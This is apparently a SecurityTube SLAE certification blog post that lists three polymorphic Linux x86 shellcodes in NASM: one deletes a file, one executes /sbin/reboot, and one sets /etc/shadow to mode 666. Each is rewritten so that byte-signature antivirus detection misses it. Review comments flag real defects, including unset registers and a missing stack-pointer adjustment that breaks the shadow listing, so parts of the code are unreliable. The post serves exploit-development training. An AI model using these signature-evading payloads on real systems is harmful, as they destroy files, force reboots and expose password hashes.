Source: SecurityTube
I recommend checking this article: Polymorphic Shellcode Engine Using Spectrum Analysis
;26 bytes
;Shellcode : linux/x86 File unlinker 18 bytes + file path length
;
; Syntax/target: NASM (Intel operand order), 32-bit Linux, int 0x80 syscall gate.
; Behaviour:     uses the jmp/call/pop pattern to get the run-time address of
;                the bytes at `file`, passes it in ebx to syscall 10 (unlink on
;                i386), then issues syscall 1 (exit) with ebx = 0.
; Variant:       the single `mov al, 0xa` of the original is replaced by three
;                arithmetic steps that leave the same value in al, so the
;                instruction bytes differ while the syscall issued is the same.
; Detection:     a byte-pattern signature keyed on the original immediate will
;                not match this listing; the unlink call and its path argument
;                are unchanged, so syscall-level auditing of unlink still sees it.
; NOTE(review):  only al is written before each int 0x80, so the upper 24 bits
;                of eax are whatever they were on entry -- nothing in this
;                listing sets them.
global _start

section .text

_start:
        jmp     one                 ; go to the call so it can push the address of `file`
two     pop     ebx                 ; ebx = return address pushed by `call two` = address of `file`
        ;mov al, 0xa                ;[ORIGIN]
        mov     al, 0x7             ;[NEW]
        add     al, 0x5             ;[NEW]
        sub     al, 0x2             ;[NEW] al = 0x7 + 0x5 - 0x2 = 0xa (unlink)
        int     0x80
        mov     al, 01              ; syscall number 1 = exit
        xor     ebx, ebx            ; exit status 0
        int     0x80
one:
        call    two                 ; pushes the address of the next byte (`file`) and jumps back
file:   db 0xaa, 0xbb, 0xcc, 0xdd; <- your file here
; Original here  (link text from the page; the link target is not preserved in this copy)
;46 bytes
;Shellcode Linux x86 PUSH reboot()
;
; Syntax/target: NASM (Intel operand order), 32-bit Linux, int 0x80 syscall gate.
; Behaviour:     builds the NUL-terminated string "/sbin/reboot" on the stack,
;                then an argv array {path, NULL} and a NULL envp, and issues
;                syscall 11 (execve on i386).
; Variant:       the literal push of "boot" is replaced by loading a different
;                constant into esi, adjusting its low 16 bits, and storing it
;                on the stack by hand; the syscall number is likewise built
;                with an add instead of a single immediate.
; Detection:     the dword 0x746f6f62 ("boot") no longer appears in the bytes,
;                so a signature on the full path literal will not match; the
;                execve of /sbin/reboot itself is unchanged and is visible to
;                process-execution auditing.
global _start

section .text

_start:
        xor     eax, eax
        push    eax                     ; string terminator (eax = 0)
        ;push 0x746f6f62; toob [ORIGINAL]
        mov     esi, 0x746f6c59         ; [NEW]
        add     si, 0x309               ; [NEW] low word 0x6c59 + 0x309 = 0x6f62, esi = 0x746f6f62
        mov     dword [esp-4], esi; [NEW] write the dword just below the current stack top
        sub     esp, 4                  ; [NEW] move esp down over it: same stack state as the original push
        push    0x65722f6e              ; er/n [ORIGINAL]
        push    0x6962732f; ibs/[ORIGINAL]
        mov     ebx, esp                ; ebx = pointer to the path string
        push    eax; 0
        mov     edx, esp                ; edx = envp, points at a NULL dword
        push    ebx
        mov     ecx, esp                ; ecx = argv = {path, NULL}
        mov     al, 0xb; [ORIGINAL]     still active in this listing; overwritten by the next instruction
        mov     al, 0x6; [NEW]
        add     al, 0x5; [NEW] 11 = NR_execve
        int     0x80
; Original here  (link text from the page; the link target is not preserved in this copy)
;Linux/x86 - chmod() 666 /etc/shadow & exit()
;39 bytes shellcode
;
; Syntax/target: NASM (Intel operand order), 32-bit Linux, int 0x80 syscall gate.
; Behaviour:     builds a path string on the stack, loads mode 0x1b6 (octal 666)
;                into cx, issues syscall 15 (chmod on i386), then increments eax
;                and issues a second syscall.
; Variant:       the literal push of 0x776f6461 is replaced by loading a
;                different constant into esi and adjusting its low 16 bits.
; Detection:     the last dword of the path no longer appears as a literal, so a
;                signature on the full path bytes will not match; a permission
;                change on /etc/shadow is a high-signal event for file-integrity
;                monitoring and chmod syscall auditing regardless of encoding.
; NOTE(review):  ecx is pushed as the string terminator and only cx is written
;                afterwards; nothing in this listing zeroes ecx first.
global _start

section .text

_start:
        push    ecx                     ; used as the string terminator -- see NOTE(review) above
        mov     cx, 0x1b6; = 438        (octal 666)
        ;push 0x776f6461; woda [ORIGINAL]
        mov     esi, 0x776f6158; [NEW]
        add     si, 0x309               ; woda [NEW] low word 0x6158 + 0x309 = 0x6461
        mov     dword [esp-4], esi;[NEW]
        ; NOTE(review): esp is not adjusted after the store above, so the push
        ; below writes to the same address ([esp-4]); as listed, the stack
        ; contents differ from what the original push sequence produces.
        push    0x68732f63; hs/c
        push    0x74652f2f; te//
        mov     ebx, esp                ;save pointer
        push    0xf                     ;chmod
        pop     eax                     ;15
        int     0x80
        inc     eax                     ;exit -- eax is 1 only if the previous syscall returned 0
        int     0x80
; Original here  (link text from the page; the link target is not preserved in this copy)
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: